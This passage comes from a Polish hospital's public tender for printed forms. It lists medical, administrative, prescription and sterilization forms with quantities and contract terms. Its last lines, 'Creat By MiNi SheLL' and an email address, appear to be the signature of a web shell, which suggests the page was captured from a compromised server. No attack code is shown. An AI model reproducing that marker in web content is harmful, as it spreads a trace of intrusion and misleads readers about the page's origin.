9	28	Karta badania profilaktycznego format pojedynczej strony A5, strony łączone w poziomie,co tworzy druk składający się z 8 str - czyli 4 kartki)  	500	szt
10	31	Karta gorączkowa niemowlęcia, format A4 w poziomie , dwustronna	2000	szt
11	32	Karta gorączkowa ogólna format A4 w poziomie, dwustronna	17000	szt
12	33	Karta informacyjna leczenia w trybie jednodniowym format A4 , jednostronny     	1500	szt
13	37	Karta konsultacji, format A4, jednostronna	13500	szt
14	47	Karta sanitarna format A4, dwustronny	200	szt
15	48	Karta serologiczna  ,kiła,, format A6, dwustronna	10	bl
16	49	Karta statystyczna szpitala ogólna format A4, dwustronna	19000	szt
17	50	Karta statystyczna do karty zgonu format A4, dwustronna	500	szt
18	375	Karta informacyjna - Izba Przyjęć, Format A5, dwustronny 	50	bl
19	52	Karta uodpornienia /karton/ format A4, dwustronne	2000	szt
20	64	Karta zgłoszenia nowotworu złośliwego /karton/ format A5, dwustronna	1000	szt
21	81	Książeczka poradni cukrzycowej, format A6, szesnasto kartkowa , okładka utwardzona 	2000	szt
22	96	Receptariusze  A 4,  jednostronny	20	bl
23	97	Receptariusze  A 5, jednostronny	310	bl
24	100	Rozkład pracy dla salowych i pielęgniarek, format A4, dwustronne (3 m-ce rozliczeniowe)	1000	szt
25	108	Skierowanie na konsultację format szer 15 cm x wys 10,5 cm, dwustronna	40	bl
26	110	Skierowanie na leczenie uzdrowiskowe format A4 dwustonny (wg, zmian NFZ)	20	bl
27	112	Skierowanie na zabiegi fizjoterapeutyczne format A5 w poziomie dwustronna	70	bl
28	113	Skorowidz do Księgi Głównej, wymiary wys 297 mm szer 135 mm / a 100 kartek	30	szt
29	114	Spis bielizny format 1/2 wys A4 i szerokość tak jak w formacie A4, jednostronny	300	bl
30	117	Wkładka do badania profilaktycznego, format A4 8 str	1000	szt
31	118	Wkładka do historii choroby poradni, format A5 w poziomie, dwustronny	230	bl
32	197	Wkładka do historii poradni neurologicznej dla dzieci, format A4, jednostronny	15	bl
33	122	Wynik badania cytologicznego wg Bethesda format A5 jednostronny	40	bl
34	125	Zapotrzebowanie żywnościowe, format A4, dwustronny	700	szt
35	126	Zapotrzebowanie na krew i środki szer 15 cm wys 7cm, jednostronne	50	bl
36	376	Karta reanimacyjna - karta badań dodatkowych, format A4 , dwustronna	1000	szt
37	377 / a 	Karta reanimacyjna - karta obserwacji  , format A4 , dwustronna A	1500	szt
38	377/ b	Karta reanimacyjna - karta obserwacji  , format A4 , dwustronna B	1500	szt
39	378	Informacja dla pacjenta przy przyjęciu do Szpitala  , wymiary 10,5 szer x 10 wys	20	bl
40	379	Podanie środka cieniującego format A5 jednostronny	15	bl
41	128	Zaświadczenie Lekarskie, szer 15 cm wys 10,5cm, jednostronne	120	bl
42	129	Zaświadczenie Lekarskie / Por. Zakładowa / format A5, jednostronny	30	bl
43	130	Zaświadczenie lekarskie z badania przeprowadzonego do celów sanitarno-epidem. Format A4, 3 strony - 2 kartki	5	bl
44	133	Zestawienie dzienne oddziału szer 29,5 cm wys 14cm, dwustronne	200	bl
45	135	Zgłoszenie urodzenia noworodka do USC szer 42 cm wys 20cm, w całości,  dwustronne	2000	szt
46	136	Zlecenie na zaopatrzenie na środki / ORT/POM/ format A4, jednostronny załącznik nr 4 	25	bl
47	136	Zlecenie na zaopatrzenie na środki / ORT/POM/ format A4, jednostronny załącznik nr 5 	10	bl
48	136	Zlecenie na zaopatrzenie na środki / ORT/POM/ format A4, jednostronny załącznik nr 6 	10	bl
49	137	Zlecenie na transport sanitarny format A5 jednostronne	70	bl
50	60	Karta stymulacji format A4, jednostronny	300	szt
51	224	Karta cukrzycowa format A4,  dwustronne	1000	szt
52	206	Formularz zgłoszenia zachorowania ( podejrzenia zachorowania na chorobę zakaźną) format A4, jednostronne	1000	szt
53	402	Protokół próby wysiłkowej format A5 - dwustronny 	15	bl
UWAGI:Cenę jednostkową netto należy podać za 100 szt, Bloczki - wymagane 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> DRUKI V Druki administracyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	4	Delegacje format A5, dwustronny	15	bl
2	380	Oświadczenie BHP Format A4 jednostronny	300	szt
3	9	Formularz zamówienia A 4, jednostronny	1000	szt
4	10	Formularz zamówienia A5 jednostronny	3500	szt
5	188	Karta kontowa materiałowa przebitkowa, karton A4, dwustronny	500	szt 
6	35	Karta kontroli środków trwałych - A4, karton, dwustronny	500	szt
7	38	Karta obiegowa, A5, jednostrony	10	bl
8	381	Arkusz spisu z  natury ( 1 + 1 ) Format A4 samokppiujący 	20	bl
9	54	Karta wynagrodzeń dla jednostek budżetowych format A4,  w poziomie dwustronna, karton	1000	szt
10	55	Karta zasiłkowa format A4, dwustronny	200	szt
11	61	Kartoteka magazynowa / ilość-wartość/ karton format A5, dwustronna	1500	szt
12	62	Kartoteka magazynowa / karton/, format A5 dwustronna - nie zmieniać rubryk	4500	szt
13	63	Kartoteka pożyczkowa, karton format A5 w poziomie dwustronna	300	szt
14	82 a	Kwestionariusz osobowy,dla osoby ubiegającej się o zatrudnienie  Format A4 , jednostronny 	500	szt
15	82	Kwestionariusz osobowy,  Format A4, jednostronny	500	szt
16	83	Kwitariusz przychodowy K-103, 3-warstwowy, samokop. Format A5, w poziomie	220	bl 
17	84	Lista obecności, A4, jednostronny	2500	szt
18	85	Lista płatnicza, A5 dwustronny, pojedyncze strony formatu A5 połączone ze sobą w poziomie tworząc druk składający się z 2 kartek czyli 4 stron	200	szt
19	86	Magazyn przyjmie, samokopiujący. Format A5, w poziomie jeden oryginał + dwie kopie	220	bl, 
20	87	Magazyn wyda, samokopiujący. Format A5, w poziomie jeden oryginał + dwie kopie	350	bl, 
21	95	Raport kasowy / twarda okładka tył i przód /  , samokopiujący A4, jednostronny	10	bl, 
22	98	Roczna karta ewidencji czasu pracy, karton, A4, dwustronny	1000	szt
23	109	Skierowanie na badanie profilaktyczne format A5 jednostronny	15	bl
24	382	Zaświadczenie o zatrudnieniu i wynagrodzeniu Rp-7 format A4 dwustronny	2	bl
25	383/ a	Polecenie Księgowania PK samokopiujące , format A5	20	bl
26	383 / b	Polecenie Księgowania PK, format A5	30	bl
27	120	Wniosek o urlop  Format A5 jednostronny	6000	szt
28	124	Zamówienia, samokopiujące, format A4	130	bl, 
29	127	Zastępcza asygnata zasiłkowa, dwustronna, szer 21 cm wys 20 cm	500	szt
30	384	Zestawienie zbiorcze spisów z natury  Format A3 dwustronny 	200	szt
31	132	Zaświadczenie Sekcja  Płac / format  A 5 jednostronny/	5	bl
32	138	Zmiana miejsca użytkowania	5	bl
33	194	Abonament miesięczny, format A 7, dwustronny	20	bl
34	193	Cegiełki wymiary szrokość 14,5 cm wysokość 7,5 cm, dwustronny	20	bl
35	199	Oddział wojewódzki NFZ format A4, jednostronny	500	szt
36	200	Informacja z wykonywanych świadczeń z zakresu specjalistycznych świadczeń zdrowotnych format A4, jednostronny	500	szt
37	201	Ilość porad udzielonym pacjentom z terenu Śląskiej Kasy Chorych format A4, jednostronny	500	szt
38	202	Wniosek wczasy ZFŚS format A4 dwustronny  Załącznik numer 2	1500	szt
39	203	Wywieszka magazynowa A6, karton, dwustronny 	1000	szt
40	190	Plan urlopów wypoczynkowych karton, format A4, dwustronny	300	szt
41	225	Zapotrzebowanie na środki odurzające i substancje psychotropowe ( bloczek samokopiujący), format A5. Jednostronny	30	bl
42	226	Wniosek o uzyskanie zasiłku opiekuńczego format A4, dwustronny	200	szt
43	227	Wniosek o udzielenie pożyczki PKZP format A5 dwustronny, kolor niebieski	500	szt
44	393	Oświadczenie ZFŚS jednostronne Format A4 - załącznik numer 1	1000	szt
45	394	Wniosek - ZFŚS dwustronny /Swięta/  Format A4 Załącznik numer 3	1000	szt
46	395	Oswiadczenie -  mobing Format A5 - jednostronny	200	szt
47	228	Wniosek o skreślenie z listy członków PKZP i przekazanie lub zwrot wkładów format A6, dwustronny	100	szt
48	229	Deklaracja przystąpienia do PKZP, format A6, dwustronny	100	szt
49	230	Deklaracja wyboru lekarza POZ format A4, dwustronny	5	bl
50	231	Deklaracja wyboru położnej POZ format A4, dwustronny	5	bl
51	232	Deklaracja wyboru pielęgniarki POZ, format A4 dwustronny	5	bl
52	233	Jadłospis format A4, jednostronny	500	szt
53	234	Jadłospis na dzień format A4, jednostronny	500	szt 
54	235	Zestawienie diet format A4, jednostronny	500	szt 
55	236	Zestawienie ( opłat od pracowników pobranych za wyżywienie w miesiącu...), dwustronny, format A4	500	szt
56	237	Dziennik ruchu chorych oddziału format A4, jednostronny	500	szt
57	238	Klasyfikacja chorych do określonej kategorii opieki format A4 dwustronny	500	szt
58	239	Karta kontroli temperatur w lodówce format A4, dwustronne	500	szt
59	241	Wykaz procedur medycznych wg. ICD 9 CM wykonywanych w poradni format A4, jednostronny	500	szt
60	242	Wykaz schorzeń podlegających konsultowaniu, diagnozowaniu i leczeniu wg ICD 10 CM format A4, jednostronny	500	szt
61	255	Ankieta dla pacjenta - dziecka format A4 dwustronny	500	szt
62	256	Ankieta dla pacjenta - dorosły, format A4, dwustronny	500	szt
63	257	Ankieta zbiorcza dla pacjenta - dziecka format A4 dwustronna	250	szt
64	258	Ankieta zbiorcza dla pacjenta - dorosły format A4 dwustronny	250	szt
65	300	Nazwa potrawy, jednostronny, szer 21 cm, wys 5 cm	60	bl
66	301	Karta żywienie pozajelitowe ( karta metaboliczna) format A4, dwustronna	1500	szt
67	302	Zezwolenie na kremację format A4, jednostronny	500	szt
68	385	Karta informacyjna o ryzku zawodowym Format A4 jednostronny	300	szt
69	386	Karta szkolenia wstępnego BHP - dwustronna Format A4  	300	szt
70	305	Karta skierowania zwłok do chłodni format A5 jednostronny	500	szt
71	306	Odstąpienie od sekcji zwłok format A4, jednostronny	200	szt
72	307	Skócony protokół sekcji zwłok format A4 4 strony	100	kpl
73	308	Wykaz pracowników zatrudnionych w porze nocnej w niedziele i święta format A4 jednostronny	1000	szt
74	309	Wykaz pracowników do naliczania wynagrodzenia za czas urlopu wypoczynkowego format A4 jednostronny	1000	szt
75	310	Ewidencja procedur medycznych w ośrodku kontroli kosztów format A4, jednostronny	500	szt
76	311	Tabela nakładu czasu pracy osób wykonujących procedury medyczne format A4 jednostronny	200	szt
77	391	Ewidencja wypożyczanych akt - Format A4- dwustronny 	1000	szt
78	392	Spis zdawczo - odbiorczy akt - Format A4 dwustronny 	1000	szt
79	312	Tabela zużycia materiałów i sprzętu medycznego format A4 jednostronny	300	szt
80	313	Rozliczenie bloków operacyjnych format A4, druk składający się z 2 kartek, jednostronny	100	szt
81	314	Rozliczenie kosztów sterylizacji dla oddziałów format A4 2 kartki	100	szt
82	315	Książka ścisłego zarachowania format A4 w poziomie, 	5	szt
83	316	Karta ewidencyjna wyposażenia format A5 , karton, jednostronna	500	szt
84	317	Do dyrekcji Szpitala o udostępnienie kserokopii mojej kartoteki format A5	2000	szt
85	318	Dane niezbędne do wypisania druku L-4 format A6	25	bl
86	387	Przyjęcie wyposazenia OW- Format A5 samokopiujace	3	bl
87	388	Przyjęcie środka trwałego OT -  Format A5 samokopiujące 	3	bl
88	389	Likwidacja środka trwałego LT-  Format A5 samokopiujace	6	bl
89	390	Protokół przekazania - przyjęcia środka trwałego PT -  Format A6	2	bl
90	425	Wniosek do Komisji Kasacyjnej - spis sprzętów (bielizny), fromat A4, jednostronny 	300	szt
91	426	Wniosek do Komisji Kasacyjnej - spis srodków trwałych, fromat A4, jednostronny 	200	szt
92	442	Paszport techniczny, format A5, dwustronny z 8 kartek, twarda okładka	100	szt
UWAGI:Cenę jednostkową netto należy podać za 100 szt, Bloczki - wymagane 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> DRUKI VI  Recepty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	367	Recepta, wymiary 90 mm ( szerokość ) i 200 mm ( długość ) i nie większy niż 110 mm ( szerokość ) i 215 mm ( długość ). Druga strona pusta. 	800  bl a 80 000 szt	
UWAGI:Cenę jednostkową netto należy podać za 100 szt, Bloczki - wymagane 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> DRUKI VII do sterylizacji sprzętu medycznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	396	Księga dezynfekcji format A4 - dwustronny	4000	szt
2	397	Księga sterylizacji format A4 - dwustronny	4000	szt
3	399	Karta przekazania narzędzi i sprzętu medycznego DO i PO  sterylizacji Format A5 dwustronna	36000	szt
4	400	Karta przekazania materiału skażonego format A5 jednostronna	1000	szt 
UWAGI:Cenę jednostkową netto należy podać za 100 szt, Bloczki - wymagane 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> DRUKI VIII  Druki medyczne III.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	409	Badanie USG prenatalne, format A4 jednostronny	500	szt
2	410	Dieta pęcherzykowa, format A4, dwustronny	500	szt
3	411	Karta dokumentu zabiegów operacyjnych, format A4, dwustronny	1500	szt
4	412	Karta - znieczulenie podpajęczynówkowe, format A6, jednostronny	45	bl
5	413	Karta cukrzycowa (poradnia), format A4, dwustronny	500	szt
6	414	Skierowanie na konsutacyjne badania serologiczne, format A4, jednostronny	20	bl
7	415	Zwrot krwii, format A4, jednostronny	12	bl
8	416	Zwrot materiału poprzetoczeniowego, format A6, jednostronny (1/2 A5)	18	bl
9	417	Karta obeserwacji pacjenta w trakcie przetaczania krwii i jej składników, format A4, jednostronny	3500	szt
10	418	Po zgodnej grupowo próbie krzyzowej i ujemnej próbie biologicznej przetoczono, format A5, dwustronny	3500	szt
11	419	Zamówienie imienne preparatu immunoglobuliny specyficznej gamma anty-D, format A4, dwustronny	1500	szt
12	420	Karta testów skórnych Allergopharma (metoda punktowa - wziewna) format A5, dwustronny	500	szt
13	421	Karta testów skórnych Allergopharma (metoda punktowa - pokarmowa), format A5, dwustronny	300	szt
14	422	Plan przyjmowania pacjentów - sala gimnastyczna, format A4, dwustronny	300	szt
15	423	Plan przyjmowania pacjentów - fizykoterapia, format A4, dwustronny	300	szt
16	424	Statystyka tygodniowa - sala gimnastyczna, format A4	300	szt
17	427	Informacja dla pacjentki - METODA CIĘCIA CESARSKIEGO, format A3, duwstronny, po złożeniu 3 str. A4	500	szt
18	428	Informacja dla pacjentki - WYCIĘCIA MACICY DROGĄ BRZUSZNĄ, format A3, duwstronny, po złożeniu 3 str. A4	200	szt
19	429	Informacja dla pacjentki - ZABURZEŃ STATYKI NARZĄDÓW PŁCIOWYCH DROGĄ POCHWOWĄ, format A3, duwstronny, po złożeniu 3 str. A4	200	szt
20	430	Informacja dla pacjentki - PRZY PODEJRZENIU NOWOTWORU ZŁOŚLIWEGO JAJNIKA, format A3, duwstronny, po złożeniu 4 str. A4	700	szt
21	431	Informacja dla pacjentki - PRZY PODEJRZENIU NOWOTWORU ZŁOŚLIWEGO MACICY, format A4, duwstronny	700	szt
22	432	Informacja dla pacjentki - WYŁYŻECZKOWANIA JAMY MACICY, format A3, dwustronny, po złożeniu 3 str. A4	800	szt
23	433	Informacja dla pacjentki - NIEZŁOŚLIWYCH ZMIAN CHOROBOWYCH SZYJKI MACICY, format A3, dwustronny, po złożeniu 3 str. A4	200	szt
24	434	Informacja dla pacjentki - GUZA (TORBIELI) JAJNIKA DROGĄ LAPAROTOMII, format A3, dwustronny, po złożeniu 3 str. A4	400	szt
25	435	Informacja dla pacjentki - MIĘŚNIAKÓW MACICY DROGĄ LAPAROTOMII, format A3, dwustronny, po złożeniu 3 str. A4	400	szt
24	436	Informacja dla pacjentki - (LAPAROSKOPIA, HISTEROSKOPIA), format A3, dwustronny, po złożeniu 3 str. A4	700	szt
25	440	Skierowanie do pracowni histopatologicznej, format A5, jednostronny	50	bl
26	441	Oświadczenie dotyczące uzyskania dokumentacji medycznej, format A5, jednostronny	100	bl
UWAGI:Cenę jednostkową netto należy podać za 100 szt, Bloczki - wymagane 100 kartek.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.96.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com